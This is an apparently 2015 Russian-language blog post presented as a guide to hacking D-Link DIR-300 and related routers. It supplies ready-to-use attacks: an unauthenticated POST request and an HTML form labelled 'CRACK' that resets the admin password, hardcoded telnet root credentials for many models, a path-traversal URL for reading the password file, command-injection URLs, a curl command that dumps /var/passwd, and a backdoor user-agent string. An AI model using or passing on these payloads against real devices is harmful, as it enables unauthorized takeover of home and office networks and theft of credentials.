вторник, 17 марта 2015 г.

Взлом dir-300

Уязвимость у D-Link DIR-300 давно известна. Суть ее проста, возможность увидеть конфигурацию роутера, а иногда и изменить пароль у admin
DIR-300
DIR-300
Суть в создании POST запроса к роутеру по адресу http://192.168.0.1:80/tools_admin.php следующего содержания:
1
2
3
4
5
6
7
8

ACTION_POST=LOGIN&
LOGIN_USER=a&
LOGIN_PASSWD=b&
login=+Log+In+&
NO_NEED_AUTH=1&
AUTH_GROUP=0&
admin_name=admin&
admin_password1=admin
После этого можно зайти на устройство используя следующую пару логин/пароль: admin/admin
Для удобства можно создать следующий html форму:
1
2
3
4
5
6
7
8
9
10
11
12
13

<form action="http://192.168.0.1/tools_admin.php" method="POST">
 <input type="hidden" name="ACTION_POST" value="LOGIN" />
 <input type="hidden" name="LOGIN_USER" value="a" />
 <input type="hidden" name="LOGIN_PASSWD" value="b" />
 <input type="hidden" name="login" value="+Log+In+" />
 <input type="hidden" name="NO_NEED_AUTH" value="1" />
 <input type="hidden" name="AUTH_GROUP" value="0" />
 Login:
 <input type="text" name="admin_name" value="admin" />
 Password:
 <input type="text" name="admin_password1" value="admin" />
 <input type="submit" value="CRACK" />
</form>
В новых версиях прошивок данную ошибку прикрыли, но осталась возможность просматривать настройки, для этого достаточно передавать некоторые параметры в GET запросах к роутеру:
1

http://192.168.0.1/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0
Подробнее можно почитать тут.
Есть еще одна возможность. При включении/перезагрузке роутера на некоторое время запускается telnet-сервер доступный всем пользователям LAN/WLAN, который можно использовать для безусловного получения полных административных прав (root) на роутере. Стандартная учетная запись:Alphanetworks Пароль: wrgg19_c_dlwbr_dir300
Тов. N!K!TA подбросил еще пару возможных паролей: wrgn23_dlwbr_dir300bи wrgn49_dlob_dir300b5
Вот еще для Dir-320 wrgg27_dlwbr_dir320
Вот еще пары — логин-пароль от PingWinbl4:
Alphanetworks wrgg19_c_dlwbr_dir300

Alphanetworks wrgn49_dlob_dir600b

Alphanetworks wrgn23_dlwbr_dir600b

Alphanetworks wrgn22_dlwbr_dir615

Alphanetworks wrgnd08_dlob_dir815

Alphanetworks wrgg15_di524

Alphanetworks wrgn39_dlob.hans_dir645
Подробнее можно почитать тут.
Так же замечу что у DIR-300 файл настроек http://192.168.0.1/config.bin зашифрован, но вытащить необходимые данные из него можно с помощьюRouterPassView
Тов. Дядюшка подбросил еще одну уязвимость:
1

http://192.168.0.1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
Все это относится и к Dir-320 (прим. версии A) На картинке демонстрирую их работу:
После авторизации в админке благодаря этой конструкции можно рестарнуть роутер:
1

http://192.168.0.1/sys_cfg_valid.xgi?&exeshell=submit%20REBOOT
Перезагружаем
Перезагружаем
Вот видео демонстрирующее полный взлом DIR-300 через Wi-Fi (WPA2 WPS):
Вот еще некоторые штуковины, которые стоит опробовать:
1

curl --data "cmd=cat /var/passwd" http://192.168.0.1/command.php
1

http://192.168.0.1/DevInfo.txt
Подробнее тут
1

curl 192.168.2.1 -A "xmlset_roodkcableoj28840ybtide"
Подробнее тут
Уязвимость CVE-2002-0140 DNS демона dnrd тут и тут
Автор: на

Комментариев нет:

Отправить комментарий

Подписаться на: Комментарии к сообщению (Atom)